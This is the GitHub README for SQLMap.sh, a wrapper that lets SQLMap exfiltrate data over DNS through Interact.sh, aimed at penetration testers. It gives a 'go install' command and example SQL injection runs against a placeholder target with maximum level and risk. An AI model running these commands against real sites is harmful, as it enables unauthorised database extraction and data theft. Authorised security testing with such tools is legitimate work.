Skip to content

SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration

License

Notifications You must be signed in to change notification settings

unlock-security/sqlmapsh

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SQLMap.sh

Go Report Card GPLv3 license GitHub release (latest by date) Twitter LinkedIn

SQLMap.sh is a SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration.

To use the SQLMap --dns-domain flag you need to open your port 53 to the internet to let it run its own DNS server and you need a properly configured domain. This is not always possible during a penetration test engagement or maybe you just don't want to buy a domain for this.

SQLMap.sh solves this problem transparently. Just use it as if it is SQLMap and your are done to exfiltrate data via DNS.

Installation

Run the following command to install the latest version.

go install github.com/unlock-security/sqlmapsh@latest

Usage

Just replace sqlmap with sudo sqlmapsh when you want to use SQLMap with data exfiltration via DNS.

Note: SQLMap requires root privileges to perform data exfiltration via DNS because it needs to bind it's own DNS server locally on port 53

For example:

$ sqlmap -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

Become:

$ sudo sqlmapsh -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

License

SQLMap.sh is distributed under GPLv3.0 License and made with 💙 by the Unlock Security team.